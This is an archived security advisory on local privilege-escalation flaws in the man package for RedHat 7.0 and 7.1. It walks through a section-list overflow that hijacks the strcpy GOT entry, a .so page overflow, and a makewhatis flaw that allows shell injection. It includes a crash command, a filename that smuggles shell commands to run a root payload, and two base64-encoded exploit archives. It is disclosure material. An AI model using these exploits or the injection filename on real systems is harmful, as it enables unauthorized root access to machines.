COMMAND

    man

SYSTEMS AFFECTED

    man 1.5h10 + man 1.5i-4 (RedHat 7.0, 7.1)

PROBLEM

    zen-parse found following.   This advisory is  also stored,  along
    with the  exploits at  http://generic.labs.pulltheplug.com/zen/ as
    man.txt. This is a bug in the man package, not the man-db package.

    Multiple versions of man are affected.  The version numbers  given
    are RedHat  rpm version  numbers.   Just because  a version is not
    listed here,  it does  not mean  it is  not vulnerable.   The main
    problem, which  allows root  is in  the /usr/sbin/makewhatis file.
    If there is  no checking for  shell metacharacters in  files being
    used as arguments, it is possible there is a problem.

    man-1.5h1
    =========

        man -S `perl -e 'print ":" x 100'` ls

    will cause  a Segmentation  fault error,  due to  incorrect bounds
    checking in the array used to hold the section list.  Stored after
    the tmp_section_list structure are the heads of a couple of linked
    lists, cat_list and man_list, which  holds the names of the  files
    already shown.

    By using a pointer to strcpy() (the last entry in the GOT) as  the
    'next' pointer,  it is  possible to  overwrite the  address of the
    library  function   'strcpy'  with   a  newly   malloc()ed  string
    containing the  name of  the file  just viewed.   The string  will
    then be executed instead of strcpy.

    (strcpy() is used, because it contains a NULL after it in the GOT,
    which looks to man to mean "This is the tail of the linked  list",
    and because it gets called at the appropriate time.)

    Exploiting this gives you gid man.  (Elevation of gid man ->  root
    dealt with after the next section).

    man-1.5i-4
    ==========
    This version does not have the -S problem.  It does how ever  have
    an overflow  in the  handling of  .so (sourced)  man pages.   If a
    manpage has

        .so something

    as the  first line,  ultimate_source() attempts  to find  the file
    refered to by the something.

    If it  is compressed,  it uses  my_popen(), a  wrapped version  of
    popen() that drops privs to  the users, to read the  contents, and
    check  that  file  for  a   .so  line  as  well.   Under   certain
    circumstances the filename will increase in length.

    As there is no checking for  the existance of the file other  than
    the  return  value  from  the  popen()  call,  it  is possible, by
    embedding shell  metacharacters in  the filename  to be  opened to
    trick it into thinking it succeeded.

    The same  commands that  fool it  into thinking  it succeeded  can
    return the next file  to look at name.   This can be done  several
    times, until the overflow has reached the desired point.  (ultname
    is 8192  bytes long,  but due  to the  layout of  the variables in
    memory, it needs an overflow of more than double that in order  to
    affect yhe list structure used  in the previous exploit, which  is
    what zen's exploit does.)

    Successful exploitation will result in gid man.

    /usr/sbin/makewhatis
    ====================

        ...
            function readline() {
                      if (use_zcat) {
                        result = (pipe_cmd | getline);
                        if (result < 0) {
                          print "Pipe error: " pipe_cmd " " ERRNO > "/dev/stderr";
                        }
        ...
                      if (use_zcat) {
                        pipe_cmd = "zcat " filename;
        ...

    Imagine a file called:

        "ls.1.gz;cd ..;cd ..;cd ..;cd ..;cd ..;cd ..;cd tmp;export PATH=.;gimmeroot;echo .1.gz"

    Mimed exploits:

    ---
    Content-Type: application/octet-stream; name="man-15first.gz"
    Content-Transfer-Encoding: base64
    Content-Disposition: inline; filename="man-15first.gz"
    Content-MD5: 98NPzNGrT4P4i5ziGbtb9g==
    
    H4sIAByb/joAA+1X62/bRgzPZ/0VrIo2sitLJz/ibI4LFEO2DtvQoQ2wD0kwyKeTpVkP406y
    nQ7530eeJMd2Hv2SPYqJgKUTyeP9juQd6dTPejLPi57YLJM8Ltyj5yfGhmw8GuFb0+G7Go/7
    4/HIGw29/hHzBsxjRzD6G7Dco1IVvgQ4Iic8pfcl+VdK6WH8kZEJqRz+fGtgMNnJcPhY/PsD
    1j+I//DE846APR+Ex+l/Hn/XBYw4eM4o8qAH8zgAbwQW8joQyjwFt1TSncUZJYaB2j34LLLe
    0pdKwMj1Bm6fMc8wgEfoRhWJJOF5IC6vYWqYV5vZN1ebEbvaDId3v1PvaiOQP/T2+bNTlJ3u
    8kwy0Q8eUJ09YnZ2X5fj/FOmTZHYC3GqQBYiGJ9cbRiuOMApnNWrE29cyfWY43IoYzNtgtjh
    AN+ESlTTaTyqVavVKpPBrNIPyCwjWWUChwJZAaqHYfPTPlaROTGM1I8zK84K8OWc29qx3S6O
    Vx3jz9rRszK8xFPFric1o9sV2Wr7UaRLHJOJZAJQjbIps/+YMkTMRt5wwFHgujMR5lJAEQmY
    JX62AD8IpFAK8hBUIfnyxurgbPjhw0VlJUUrS7QyCzWxCRo568EyR6GQUOTaVuangkzQWGwE
    Lwt/lgjMEgQ5tQhjt9tJ/STJuTXoDjsTLblk17VwK8MtkrCGUunY5q/vLt5PXdykazZSv2ik
    2xy8LzIxh4sozuaUzGazqvfYqrhAI5mLAlUt8+L84y/VmkuJOw6tyoCtBdNXyrRxUmO4fz1l
    +2YOt1UbQQ3EtghiGcXoxONXigB6x6b9ukJ+ObrW+jeqEKlVL7E3W/Aoh+P34oZ8LsXx260V
    d5OGjrdx5p+ftoeHe9VDAiWKcgk8T3F2kMQZxa0OAKadbXraAZg3ljdJzjwPn2/edAzA3Gz8
    rfW+1Xq7rNfLe5w/iHNr6CxJhGXuXjemDhg+e5wen0xb292kXdNmNu4E594a//YN+nXTQ/W/
    T4xnbAC+VP+HJ+PD+j/uD9r6/0/QQf0vsf4zsGizdf3f6whWsQ/UBLii4C6XeeYEfpzcYNIs
    xDryixj7RuQCXhxV46Cqo9xIn2ggXsYZT8pAwFmZxaoInOjtDg8ZcU4s42UgQryT4OLDdx/P
    312cg6nBrMoE21aqMr0i38voHoLu0T2Ciy/iIIiFcl0cP2BII8aLWtApqC7PRDkeXp0THoDj
    PPykYotr5bIAXZicCVYLQjDRl7KeT4vXZBhUR3m+rmqC0kWdWMs4oKIdWkpxP8OXbb7qKtj7
    BXiFo17nxdSrb9y6CJif8lTo2gaxAsWlWN/AOi4icJcy526S+4G/mjtXVd3D+zYurEF9+Uq8
    8WVWAbg1jKqHSONkgc5YCKsGZ+/gbWoPYnRXvnS5z6PKa1WgCSjhnGyNK21atzbawvc//nwO
    XcIWNm0LfShsa/rDbVsjVnGCJWix5WrflZLgJL4qGp+B5XOOfYt1CMe0f/v9w0+dA2eVkAkR
    wFrGhYBqJrUud3PpUDhQyBvY/h9qPNfYQH2Msz4fqGNT3c1AlhkOMAK4l7n0U/DnuON9r3u1
    1zHSLyztgGmYL0WG2HdDhSVPmp1OB/ahkyZFeU8XQjyGInDuYSQo9TmAdZ4d01MudGLkZQFx
    sQ+tX0MLcWdKY1M2ed7WMHXZ50muhLX9roMwpXzW+sRcR4imiUhzvuyPe4F4etuE6HEQ91Do
    bqRKi10kNbizaSVqvnW3omFgB5RSet2BvMv6WtluUrCjF7ol/7RNR0sttdRSSy211FJLLbXU
    UksttdRSSy211FJL/3H6CxcC6PYAKAAA
    
    -----
    
    ---
    Content-Type: application/octet-stream; name="man-15second.gz"
    Content-Transfer-Encoding: base64
    Content-Disposition: inline; filename="man-15second.gz"
    Content-MD5: 9DkClpUM1IMmIRl5XuBLOw==
    
    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
    /vovHX93427cjbtxN36Z8V+HkzhxACgAAA==
    
    -----

SOLUTION

    For more info:

        http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=19351
        https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=40400
        https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=41805
        https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=42450
        http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=43213